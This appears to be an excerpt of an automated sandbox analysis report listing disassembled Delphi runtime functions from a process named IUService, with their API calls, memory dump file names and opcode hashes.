                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00000000,5002A8E2), ref: 5002A7E6
                                                                                                                                            • GetLastError.KERNEL32(?,00000000,5002A8E2), ref: 5002A801
                                                                                                                                            • @Sysutils@SysErrorMessage$qqrui.RTL120(?,00000000,5002A8E2), ref: 5002A809
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,?,00000000,5002A8E2), ref: 5002A82B
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,?,00000000,5002A8E2), ref: 5002A830
                                                                                                                                            • FindResourceW.KERNEL32(00000000,DESCRIPTION,0000000A,00000000,5002A8C5,?,00000000,5002A8E2), ref: 5002A84E
                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,00000000,DESCRIPTION,0000000A,00000000,5002A8C5,?,00000000,5002A8E2), ref: 5002A85C
                                                                                                                                            • LockResource.KERNEL32(00000000,00000000,5002A8A1,?,00000000,00000000,00000000,DESCRIPTION,0000000A,00000000,5002A8C5,?,00000000,5002A8E2), ref: 5002A87C
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,00000000,5002A8A1,?,00000000,00000000,00000000,DESCRIPTION,0000000A,00000000,5002A8C5,?,00000000,5002A8E2), ref: 5002A885
                                                                                                                                            • FreeResource.KERNEL32(00000000,5002A8A8,?,00000000,00000000,00000000,DESCRIPTION,0000000A,00000000,5002A8C5,?,00000000,5002A8E2), ref: 5002A89B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Resource$Open$LoadSystem@@Unicode$ErrorModuleQueryStringSysutils@Value$Asg$qqrr20Char$qqrr20CloseExcept$qqrvException@$bctr$qqrp20FileFindFreeFromHandleLastLibraryLockMessage$qqruiModule$qqrpboNameRaiseRecpx14RecxiStringpbStringx20
                                                                                                                                            • String ID: DESCRIPTION
                                                                                                                                            • API String ID: 3160456903-3773289166
                                                                                                                                            • Opcode ID: 9c728f30882331a281c9099e372204b5d02cfbfa5d2dcb8aba3413716321baf8
                                                                                                                                            • Instruction ID: 2fbb488c572c727051016de5f65cec4f5785d2b5e39462af3f2b4d4cfef47028
                                                                                                                                            • Opcode Fuzzy Hash: 9c728f30882331a281c9099e372204b5d02cfbfa5d2dcb8aba3413716321baf8
                                                                                                                                            • Instruction Fuzzy Hash: 2731A270A062D9AFEB05CFF4EC55B9DB7F9EB1A304F9045A6F500A3242DE385A40C7A0
                                                                                                                                            Function 5002D988 Relevance: 25.6, APIs: 17, Instructions: 135COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,5002DB19,?,00000000), ref: 5002D9D3
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(00000000,5002DB19,?,00000000), ref: 5002D9CE
                                                                                                                                              • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                                                              • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                                                              • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002D9F7
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002D9FC
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DA1F
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DA24
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002DB19,?,00000000), ref: 5002DA41
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DA70
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DA75
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120(00000000,5002DB19,?,00000000), ref: 5002DA7F
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DAAA
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002DB19,?,00000000), ref: 5002DAAF
                                                                                                                                            • @Sysutils@TEncoding@GetByteCount$qqrx20System@UnicodeStringii.RTL120(5002D963,00000000,?,00000000,5002DB19,?,00000000), ref: 5002DABD
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(5002D963,00000000,?,00000000,5002DB19,?,00000000), ref: 5002DAD8
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(5002D963,00000000,?,00000000,5002DB19,?,00000000), ref: 5002DADD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$String$RaiseSysutils@$Except$qqrvException@$bctr$qqrp20$Recpx14Recxi$Unicode$AfterAnsiArrayByteClassClassoConstruction$qqrp14Count$qqrx20Create$qqrp17Encoding@Error$qqrucFromInternalLength$qqrvList$qqrvLoadMetaObjectStr$qqrr20String$qqrp20StringiiStringx27System@%T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1510222668-0
                                                                                                                                            • Opcode ID: 04cde6b8ab52445afbce40d0579e5524d879601997f477b20f500470919b9e46
                                                                                                                                            • Instruction ID: c200511c8af83f716f27c4f8f74ee48d0f5db12a54d239dde748c8e376a153b6
                                                                                                                                            • Opcode Fuzzy Hash: 04cde6b8ab52445afbce40d0579e5524d879601997f477b20f500470919b9e46
                                                                                                                                            • Instruction Fuzzy Hash: 1551A330A065869FDB10DFA8ED91AAEB7F9EF54304F508266F904D7351CB70AE01CBA1
                                                                                                                                            Function 5002D778 Relevance: 25.6, APIs: 17, Instructions: 120COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002D7AB
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002D7A6
                                                                                                                                              • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                                                              • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                                                              • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002D7C9
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002D7CE
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D7F1
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D7F6
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D819
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D81E
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002D826
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D84B
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D850
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002D85A
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,00000000,?,?), ref: 5002D885
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,00000000,?,?), ref: 5002D88A
                                                                                                                                            • @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%ii.RTL120(5002D771,00000000,00000000,?,?), ref: 5002D898
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(5002D771,00000000,00000000,?,?), ref: 5002D8B3
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(5002D771,00000000,00000000,?,?), ref: 5002D8B8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$RaiseStringSysutils@$Except$qqrvException@$bctr$qqrp20$Recpx14Recxi$ArrayLength$qqrv$AfterArray$tb%iiByteClassClassoConstruction$qqrp14Count$qqrx24Create$qqrp17DynamicEncoding@Error$qqrucList$qqrvLoadMetaObjectString$qqrp20System@%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1237184820-0
                                                                                                                                            • Opcode ID: 952b74f017d3762d293e9f3b11fffa3ac327c9001284a9ce47d9ecc3364eade9
                                                                                                                                            • Instruction ID: a3c714428ec61206f39ef323b742ab525dddacf128d87db4c55a7e7c244486e1
                                                                                                                                            • Opcode Fuzzy Hash: 952b74f017d3762d293e9f3b11fffa3ac327c9001284a9ce47d9ecc3364eade9
                                                                                                                                            • Instruction Fuzzy Hash: E2416F30E0658A9FDB10DFD8FD85AAEB7B9AF54304F10425AF90497352DB71AE01CBA1
                                                                                                                                            Function 50031598 Relevance: 24.1, APIs: 16, Instructions: 133COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Variants@@VarFromInt$qqrr8TVarDataxixzc.RTL120(00000000,5003177B,?,?,?,00000000), ref: 5003162F
                                                                                                                                            • @Variants@@VarFromInt$qqrr8TVarDataxixzc.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031642
                                                                                                                                            • @Variants@@VarFromReal$qqrv.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031653
                                                                                                                                            • @Variants@@VarFromReal$qqrv.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031664
                                                                                                                                            • @Variants@@VarFromCurr$qqrv.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031675
                                                                                                                                            • @Variants@@VarFromReal$qqrv.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031686
                                                                                                                                            • @Variants@@VarFromWStr$qqrr8TVarDatax17System@WideString.RTL120(00000000,5003177B,?,?,?,00000000), ref: 5003169F
                                                                                                                                            • @Variants@@VarFromBool$qqrr8TVarDataxo.RTL120(00000000,5003177B,?,?,?,00000000), ref: 500316B8
                                                                                                                                            • @Variants@@VarFromInt$qqrr8TVarDataxixzc.RTL120(00000000,5003177B,?,?,?,00000000), ref: 500316CC
                                                                                                                                            • @Variants@@VarFromInt$qqrr8TVarDataxixzc.RTL120(00000000,5003177B,?,?,?,00000000), ref: 500316E0
                                                                                                                                            • @Variants@@VarFromInt$qqrr8TVarDataxixzc.RTL120(00000000,5003177B,?,?,?,00000000), ref: 500316F1
                                                                                                                                            • @Variants@@VarFromInt$qqrr8TVarDataxixzc.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031701
                                                                                                                                            • @Variants@@VarFromInt64$qqrr8TVarDataxj.RTL120(?,?,00000000,5003177B,?,?,?,00000000), ref: 50031714
                                                                                                                                            • @Variants@@VarFromUInt64$qqrr8TVarDataxuj.RTL120(?,?,?,?,00000000,5003177B,?,?,?,00000000), ref: 50031727
                                                                                                                                            • @Variants@@VarCopyNoInd$qqrr8TVarDatarx8TVarData.RTL120(00000000,5003177B,?,?,?,00000000), ref: 50031735
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(50031782,?,?,00000000), ref: 50031775
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Variants@@$From$DataxixzcInt$qqrr8$Real$qqrv$Int64$qqrr8$Bool$qqrr8Clr$qqrpvCopyCurr$qqrvDataDatarx8Datax17DataxjDataxoDataxujInd$qqrr8Str$qqrr8StringSystem@System@@Wide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1012867692-0
                                                                                                                                            • Opcode ID: 0d706630987602831d493e185933a0c614700174b10b453fd8f24576d447ecb0
                                                                                                                                            • Instruction ID: 379c610481b3938701a24ff1c6e680b783a9edc1522a16b2d264831e533fbfcd
                                                                                                                                            • Opcode Fuzzy Hash: 0d706630987602831d493e185933a0c614700174b10b453fd8f24576d447ecb0
                                                                                                                                            • Instruction Fuzzy Hash: A8412434309EA08F8712AF58D9818D973B5AB8DA80F6CC352F544CF319DA74DD41A7D2
                                                                                                                                            Function 500236AC Relevance: 22.6, APIs: 15, Instructions: 107threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50023814), ref: 500236D8
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50023814), ref: 50023706
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000200,00000000,50023814), ref: 5002371A
                                                                                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,50023814), ref: 50023726
                                                                                                                                            • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 5002372C
                                                                                                                                            • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 50023746
                                                                                                                                            • @Sysutils@CharToByteLen$qqrx20System@UnicodeStringi.RTL120(?,00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 5002376D
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 5002377B
                                                                                                                                              • Part of subcall function 5000A464: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A525), ref: 5000A4A0
                                                                                                                                              • Part of subcall function 5000A464: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5000A525), ref: 5000A4F9
                                                                                                                                            • @Sysutils@ByteToCharLen$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 500237A6
                                                                                                                                            • @Sysutils@CharToByteIndex$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 500237B7
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 500237D3
                                                                                                                                            • @Sysutils@CharToByteLen$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 500237E3
                                                                                                                                            • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000200,00000000,50023814), ref: 500237EE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$Char$From$ByteStringStringiSysutils@$Len$qqrx20Stringpbi$Asg$qqrr20Len$qqrr20Stringx20$AnsiArray$qqrr20Char$qqrr20Char$qqrx20Copy$qqrx20DateFormatIndex$qqrx20InternalLocaleStr$qqrr20StringiiStringpbStringx27System@%T$us$i0$%Thread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3483906196-0
                                                                                                                                            • Opcode ID: 07ec6dc5ae61966c67d195a7f413b0f24ab838b4146774390f1e3ff9206560d6
                                                                                                                                            • Instruction ID: 4f9631fb190bdf22358dadba8d9e4bcdbf434579e9ae2086efaa57f8c8f505f9
                                                                                                                                            • Opcode Fuzzy Hash: 07ec6dc5ae61966c67d195a7f413b0f24ab838b4146774390f1e3ff9206560d6
                                                                                                                                            • Instruction Fuzzy Hash: 7231A274A461998FEF20DBA8E89569DB3F4EF18300F5042A6F808E7315DA34DE01CBD1
                                                                                                                                            Function 500229F4 Relevance: 22.6, APIs: 15, Instructions: 107threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50022B5C), ref: 50022A20
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50022B5C), ref: 50022A4E
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000100,00000000,50022B5C), ref: 50022A62
                                                                                                                                            • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022A6E
                                                                                                                                            • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022A74
                                                                                                                                            • @System@@UStrFromWArray$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022A8E
                                                                                                                                            • @Sysutils@CharToByteLen$qqrx20System@UnicodeStringi.RTL120(?,00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022AB5
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022AC3
                                                                                                                                              • Part of subcall function 5000A464: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A525), ref: 5000A4A0
                                                                                                                                              • Part of subcall function 5000A464: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5000A525), ref: 5000A4F9
                                                                                                                                            • @Sysutils@ByteToCharLen$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022AEE
                                                                                                                                            • @Sysutils@CharToByteIndex$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022AFF
                                                                                                                                            • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022B1B
                                                                                                                                            • @Sysutils@CharToByteLen$qqrx20System@UnicodeStringi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022B2B
                                                                                                                                            • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,00000004,?,00000000,?,00000100,00000000,50022B5C), ref: 50022B36
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@Unicode$System@@$Char$From$ByteStringStringiSysutils@$Len$qqrx20Stringpbi$Asg$qqrr20Len$qqrr20Stringx20$AnsiArray$qqrr20Char$qqrr20Char$qqrx20Copy$qqrx20DateFormatIndex$qqrx20InternalLocaleStr$qqrr20StringiiStringpbStringx27System@%T$us$i0$%Thread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3483906196-0
                                                                                                                                            • Opcode ID: 14b31e75bbe4f29b0344d47f151fd9c0e418cd3dfaf5d63b438e38d57a2d97fd
                                                                                                                                            • Instruction ID: 53e8520a94321b9216bfb608fab58842445848e9737d4ff382ae0df39ef9d34b
                                                                                                                                            • Opcode Fuzzy Hash: 14b31e75bbe4f29b0344d47f151fd9c0e418cd3dfaf5d63b438e38d57a2d97fd
                                                                                                                                            • Instruction Fuzzy Hash: EA31B234A425999FDB11DFA8E89569DB3F4EF18300F5042A6F808E7315DB349E02CBD2
                                                                                                                                            Function 5001C70C Relevance: 21.2, APIs: 14, Instructions: 161COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C84D
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C749
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001C8D4), ref: 5001C774
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001C8D4), ref: 5001C79A
